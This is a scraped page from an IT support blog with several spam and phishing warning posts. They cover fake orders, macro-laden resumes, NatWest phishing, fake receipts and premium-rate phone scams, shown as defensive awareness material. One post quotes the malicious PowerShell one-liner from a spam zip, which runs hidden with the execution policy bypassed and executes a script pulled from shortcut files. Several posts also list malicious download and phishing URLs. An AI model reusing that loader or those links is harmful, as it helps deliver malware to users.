sircles.net Computer Support The sircles IT support & solutions blog | Viruses and Malware threats

Twitter Feed Popout byInfofru

The sircles IT support & solutions blog Internet Safety & Security, Windows Tweaks and Server Fixes

Spam Warning: Your Name, Pack(4M0A_8141) confirmed: 5 items sent

Spam Warning: Your Name, Pack(4M0A_8141) confirmed: 5 items sent   This email has been spotted

Spam Warning: Your Name, Pack(4M0A_8141) confirmed: 5 items sent

 

This email has been spotted this week:

 

 

 

From: lou_weihe@clarityconfidenceandcash.com

Sent:                                                         Monday, July 30, 2018 10:52 PM

To:                                                            Recipient

Subject:                                                   Your, Name Pack(4M0A_8141) confirmed: 5 items sent

 

Your order confirmation. Hi Simon, Great news! Your order is now confirmed. We will email you again when your items ship.

 

WOMEN

MEN

ACCESSORIES

HOME DECOR

GADGETS


Hi Your Name,

Great news! Your order is now confirmed. We will email you again when your items ship.

Thanks for shopping with us!

Order ID: 4M0A_8141

Shipping Address:

Your Name
Your Phone Your Postcode 

View Order


This email was sent from a notification-only address that cannot accept incoming emails.
Please do not reply to this message. If you have any questions or concerns, please contact us 

 

 
Which downloads a file: 4M0A_8141-order-Receipt.zip
Zip files are not often used as orders anyway but this website, https://johanwolf.com obviously has a valid certificate and is being misused by someone. The website just seems to forward to Office365 support for some reason???
 
If you unzip the file that is provided you see an image:
 
 
Which presumably pretends to be a real company.
 
And a file which runs a script:
 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -executionpolicy bypass -win hidDEN  -comman cd %USERPROFILE%\Documents; findstr /s bremodilu ..\*.lnk > file.ps1;.\file.ps1;exit
 
Which will make serious changes to your system. Looking at this we are not sure it would work but might try it on an old PC ..?
 
We will let you know.
 
Anyway, report the sender and the website and keep vigilant!
 
 

About a internship! Fake Resume or CV SPAM!

About a internship! SPAM!   Microsoft Office documents are a dangerous source of macros and oth

About a internship! Fake Resume or CV SPAM!

 

Microsoft Office documents are a dangerous source of macros and other types of malware. Typically a dangerous document will be disabled by later versions of Microsoft Office in order to protect the user and as a result the modern spam malware office docs have a front page explaining that they need to be unlocked.

Let's have a quick look at one:

Here is a message containing a resume we have received today...

Hello there! I hope you are well!

I am absolutely interested in a internship.
Find my attached resume and reply ASAP.

The password for the file is 123123

Looking forward to hearing back from you!
Dayna

If we double-click the attachment containing 'Danya's Resume' we see the password request in Microsoft Word 2016.

We enter the password provided and then...

 

 

The text in the document pane has actually been added by the spammers. That 'was this information helpful?' text is just an image captured from the Microsoft website just as we have captured this image from the spammers. The 'Yes' and 'No' buttons are not live - they are just there to persuade you that this is a Microsoft message. The text is there to persuade you to enable the macros in this document but definitely do not.

The only true Microsoft advice here is in yellow at the top where you are 'Be careful-email attachments can contain viruses. Unless you need to edit, it's safer to stay in protected view.' and it is. We would suggest that unless you are awaiting the document and it is from the person you are expecting it to be from, never enable a Microsoft Document for editing.

Let us make sure that this document is not one we are expecting - if we click on the File menu on Microsoft Word and select the Info option we can see the below:

 

 

As we can see from the details, this document is nonsense and is not from anyone we know or want to know.

Label these as spam and report the originator to your email administrator or provider.

We have seen the following alternate subjects for the same email:

  1. About a career?
  2. Concerning a internship.
  3. Regarding a career!
  4. Regarding a job?

Mac Detox Software - is it a good thing?

22. May 2018 13:09 by sirclesadmin in Viruses and Malware threats
Mac Detox Software - is it a good thing?   If you are a Mac user then you will find your comput

Mac Detox Software - is it a good thing?

 

If you are a Mac user then you will find your computer slowing down just like anyone else's. There is a finite amount of processing power, RAM space and disk throughput that will eventually be maxed-out by the softwares you are running.

The Mac does not have a registry like Windows where the system needs all sorts of details to reference what processes are running and so it is not difficult to remove unwanted start-up programs.

There is a great article on what to do here: https://www.macworld.com/article/2047747/take-control-of-startup-and-login-items.html

MAc detox software - even if it is free - is coming at a cost, whether they are corrupting your browser search results or just recording your activity, you do not need proprietary software to clean a Mac.

We have been seeing a lot of sircles blog spam recently trying to add forwards and links to various Mac clean-up sites and we do not recommend using any. Stick to the trusted sites for information, such as MacWorld and keep your MAc clean of software that may cause more problems than your computer just being slow.

Natwest Spam: Incomplete Security Information

Natwest Spam: Incomplete Security Information    

Natwest Spam: Incomplete Security Information

 

You may receive the following message, purporting to be from Natwest:

 

From:                                                       NatWest <info@ipconnect.de>

Sent:                                                        Date

To:                                                            Recipient

Subject:                                                   Incomplete Security Information

 

 

 

 

 

 

 

 

Incomplete Security Information

 

 

 

 

 

Hello,


Information we use to determine the security of your account is missing we need you to confirm as soon as possible.

 

Details:
You are required to review and update missing information*

We have temporarily suspended your online access to prevent any loss to your balance until you securely submit missing information: Click below to continue

RESTORE MY ACCOUNT

 

 

Thank You,
The NatWest Accounts team

 

*The location is approximate and determined by the IP address it was coming from.

This email can't receive replies. For more information, visit the NatWest Accounts Help Center.

 

 

 

 

You received this mandatory email service announcement to update you about important changes to your NatWest product or account.

© 2018 NatWest Inc.,

 

 

  
 
The link in the message tries to take you to: http://www.betonruettler.at/statistik/nwolb/index.php
 
Please mark as spam - the website appears to have already been fixed and the bad content removed... :)
 
 
 
 

Disability Action Alliance - DAA Receipt#

Disability Action Alliance - DAA Receipt# &amp;nbsp;

Disability Action Alliance - DAA Receipt#

 

 

From:                                                        invoice@culqi.net on behalf of Disability Action Alliance – DAA <invoice@culqi.net>

Sent:                                                         Date

To:                                                             Recipent

Subject:                                                     Receipt # 8453985   Receipt # 9599113

 

 

Payment Receipt

YOUR PAYMENT HAS BEEN PROCESSED

Your payment has been received, please find attached your PDF invoice.

   

Spam: Receipt # 255247

Spam:&amp;nbsp;Receipt # 255247 &amp;nbsp; Beware of these fake receipts: Payment Receipt YOUR PAYMENT HAS B

Spam: Receipt # 255247

 

Beware of these fake receipts:

Payment Receipt

YOUR PAYMENT HAS BEEN PROCESSED

We send  Google.Docs document.

Link points to: https://www.ethereumpower.io/itr_inv_doc.zip

Which obviously downloads a inv doc.zip file to corrupt your computer or add a root kit etc.

We have reported the Google link and the website as well as marking the email as spam - please do the same if you receive one of these.

Spam: Receipt # 255247

Spam:&amp;nbsp;Receipt # 255247 &amp;nbsp; Beware of these fake receipts: Payment Receipt YOUR PAYMENT HAS B

Spam: Receipt # 255247

 

Beware of these fake receipts:

Payment Receipt

YOUR PAYMENT HAS BEEN PROCESSED

We send  Google.Docs document.

Link points to: https://www.ethereumpower.io/itr_inv_doc.zip

Which obviously downloads a inv doc.zip file to corrupt your computer or add a root kit etc.

We have reported the Google link and the website as well as marking the email as spam - please do the same if you receive one of these.

Spam Warning: Shipment status changed for parcel #1188!

24. January 2018 16:12 by sirclesadmin in Viruses and Malware threats, SPAM
Spam Warning: Shipment status changed for parcel #1188! &amp;nbsp; You may receive the following: Spam W

Spam Warning: Shipment status changed for parcel #1188!

 

You may receive the following:

Spam Warning: Shipment status changed for parcel #1188!

A parcel was sent to you on 19/01/2018 via U.S. Postal Service Economy.

The following optional services were used:  Shipment status via email

You can view the tracking number and the delivery information on the tracking invoice enclosed below :

http://www.usps.com/shipping/trackandconfirm.htm ?action=download&trk_id=4209676728001104401363764606  

Thank you for shipping with USPS

******************************************************** ***************
NOTE:
 This e-mail was generated by USPS (www.usps.com)
 at the sender's request. 

Please contact 
 the sender of this e-mail or the U.S. Postal Service if you have 
 questions about the package delivery.

If you receive this message then it IS SPAM. The link above takes you to a file to download which can be harmful to your computer.

Following this being published, the file appears to have been removed.

Purchase Order No_18081994 - Fake Invoice PDFs with Spam URL Links

Purchase Order No_18081994 - Fake Invoice PDFs with Spam URL Links &amp;nbsp;

Purchase Order No_18081994 - Fake Invoice PDFs with Spam URL Links

We have seen some fake purchase order emails today that have been modified in order to circumvent our latest advice on receiving bills by email. PDFs are the usual, preferred method but they can also be used to send links to potentially hazardous material and so, to clear up any confusion:

Do not open links from questionable senders in any format!

 

 

 

From:                                         De la Rosa, Samuel <samuel.delarosa@swissport.com>

Sent:                                           30 August 2017 00:57

Subject:                                     Purchase Order No_18081994

Attachments:                          Purchase Order No_18081994.pdf

 



Dear Sir/Madam,

We are pleased to place an order with you which you will find attached.Please confirm the receipt of this order by email and let us have your order acknowledgement.
Do not hesitate to contact us if there are any questions regarding this order.

Best regards,

De La Rosa,Samuel
Customer & Technical Service

 

The email contains a PDF:

 

 

Now the PDF includes a link to an external page:

 

 

There is no reason to send a PDF which contains this link - this is just to avoid detection of the link in the email. If you click on the link on a Windows PC using IE you receive a warning:

 

 


Firstly, remove the tick from this box - never trust any link from anything!!!

A PDF link can be as dangerous as any other link!!!

 

Now do we recognise this domain? http://roarr.org It is an .ORG domain in this case, but unless you recognise the domain, click BLOCK and send the email to JUNK

If you decide to open this particular link, you will receive:

 

 

This has been reported to Microsoft as a dangerous domain - DO NOT OPEN!!!

 

If we continue, against all advice, we can see that it is an impersonation of DocuSign:

 

 

Always check the domain in the address bar at the top against what you are seeing - this is obviously a spam site trying to get your email address and password CLOSE THIS PAGE AND DELETE THE EMAIL!!

 

Phone number email spams

24. August 2017 10:46 by sirclesadmin in Viruses and Malware threats, SPAM
Phone number email spams Watch out for these emails trying to get you to phone an expensive number:

Phone number email spams

Watch out for these emails trying to get you to phone an expensive number:

Name : Sophie Morgan

Email : morgan.sophie@writeme.com

Tel: 8712771062

Message : Please call me on +44 8712771062

If you email the address above you receive:

Subject: Auto-Reply

Hi, unfortunately I am unable to reply to your e-mail at the moment.

Please call me on +44 8714340521 Kind regards Sophie Morgan

The phone number is simply an expensive telephone call from which they will pocket a few pence - DO NOT CALL THIS NUMBER!!!

 

The postal address Address: Wye St, London SW11 2HB, UK and email: jessica.mitchell@post.com now seem to be prevalent with this spam post. It is simply an adjustment to avoid spam filtering, but the phone number is not so easily changed as it is obviously a custom-registered number to send them money. Our advice is to filter based on the phone number, with and without +44.

One of the most annoying issues with this is that the numbers cannot be easily identified or the owners tracked down and held responsible as reverse look-up on these numbers relies on the number having been published in the first place and there is no publicly available register such as with domain names (although these are largely suppressed now - wrongly, in our opinion) and so there is little immediate action that can be taken.

The latest versions of these emails are now appearing as:

 

Name :  Nisha

Email :  nisha@matridtech.net

Tel:  +1-855-370-5507

Message :   May I Have the privilege of Connecting with you?

As you can see from the above they are US numbers in this example.

 

If you have any questions regarding spam or require any assistance, you can use the messenger icon at the bottom of the screen or contact us at https://www.sircles.net